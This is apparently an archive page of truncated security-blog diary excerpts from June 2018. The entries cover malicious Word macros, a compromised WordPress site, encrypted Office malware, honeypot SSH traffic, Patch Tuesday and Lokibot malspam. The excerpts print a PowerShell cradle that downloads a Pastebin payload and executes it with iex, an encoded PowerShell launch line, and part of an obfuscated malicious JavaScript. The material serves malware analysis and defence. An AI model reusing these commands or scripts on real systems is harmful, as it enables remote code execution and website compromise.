Archive by Author

PowerShell: ScriptBlock Logging… Or Not?, (Tue, Jun 19th)

Here is an interesting piece of PowerShell code which is executed from a Word document (SHA256: eecce8933177c96bd6bf88f7b03ef0cc7012c36801fd3d59afa065079c30a559[1]). The document is a classic one. Nothing fancy, it executes the macro and spawns a first PowerShell command:

powershell $h=New-Object -ComObject Msxml2.XMLHTTP
$h.open('GET','hxxps://pastebin[.]com/raw/dqHSgxmE',$false)
$h.send()
iex $h.responseText

The following payload is downloaded from Pastebin:

powershell -noP -sta -w 1 -enc […]

Malicious JavaScript Targeting Mobile Browsers, (Mon, Jun 18th)

A reader reported a suspicious piece of JavaScript code that was found on a website. In the meantime, the compromised website has been cleaned, but it was running WordPress (again, I would say![1]). The code was obfuscated; here is a copy:

var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72", […]

Encrypted Office Documents, (Sun, Jun 17th)

Last I had to analyze a malicious, encrypted Excel document, with a twist. It was using the encrypted file format for OOXML files (.docx, .xlsx, …). I knew this because of oledump's report: when an OOXML file is encrypted, it is stored inside an OLE file, and stream EncryptedPackage contains the encrypted document. Malware authors will […]

Anomaly Detection & Threat Hunting with Anomalize, (Sat, Jun 16th)

When, in October and November's posts, I redefined DFIR under the premise of Deeper Functionality for Investigators in R, I discovered a "tip of the iceberg" scenario. To that end, I'd like to revisit the concept with an additional discovery and opportunity. In reality, this is really a case of DFIR (Deeper Functionality for Investigators in R) within the general practice of the original and paramount […]

SMTP Strangeness – Possible C2, (Fri, Jun 15th)

We received an email today that provided some interesting information from a reader (Bjorn) about some observed SMTP traffic that was unusual. From the appearance it could be related to exfil or C2. The domain in question is donotspamtoday.com, whose IP is 185.14.30.147, and there is a DNS TXT entry for SPF. The domain was registered […]

A Bunch of Compromized WordPress Sites, (Wed, Jun 13th)

A few days ago, one of our readers contacted us to report an incident affecting his website based on WordPress. He performed quick checks by himself and found some pieces of evidence: the main index.php file was modified and some very obfuscated PHP code was added on top of it; a suspicious PHP file was dropped in every […]

From Microtik with Love, (Wed, Jun 13th)

We've found interesting new traffic within our Honeytrap agents, originating from servers within Russia only (to be specific, the netblock owned by NKS / NCNET Broadband). The username and password combination being used is root / root, and they are executing all of the following ssh commands:

/ip cloud print
help
ifconfig
uname -a
show ip
cat […]

Microsoft June 2018 Patch Tuesday, (Tue, Jun 12th)

June 2018 Security Updates

Description | CVE | Disclosed | Exploited | Exploitability (old versions) | Exploitability (current version) | Severity | CVSS Base (AVG) | CVSS Temporal (AVG)
Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2018-8227 | No | No | – | – | Important | 4.2 | 3.8
Chakra Scripting Engine Memory Corruption Vulnerability | CVE-2018-8229 | No | No | – | – | Critical | 4.2 | 3.8
Cortana Elevation of Privilege Vulnerability | CVE-2018-8140 | No | No | Less Likely | Less Likely | Important | […]

More malspam pushing Lokibot, (Mon, Jun 11th)

Introduction

A tweet last week by @malwareunicorn reminded me I haven't searched out any Loki-Bot malspam in a while. Shown above: this tweet gave me a good chuckle. Loki-Bot (also spelled "Loki Bot" or "LokiBot") is an information stealer that sends login credentials and other sensitive data from an infected Windows host to a server […]

What Systems Keep You Effective?, (Sat, Jun 9th)

Previously I discussed What's On Your Not To Do List as a means to remain focused on priorities. I never fear running out of work in cybersecurity. Instead, I worry that our focus does not always stay on the most critical issues. Today I want to highlight several techniques I use to help remain effective.

Saying no

Over and […]
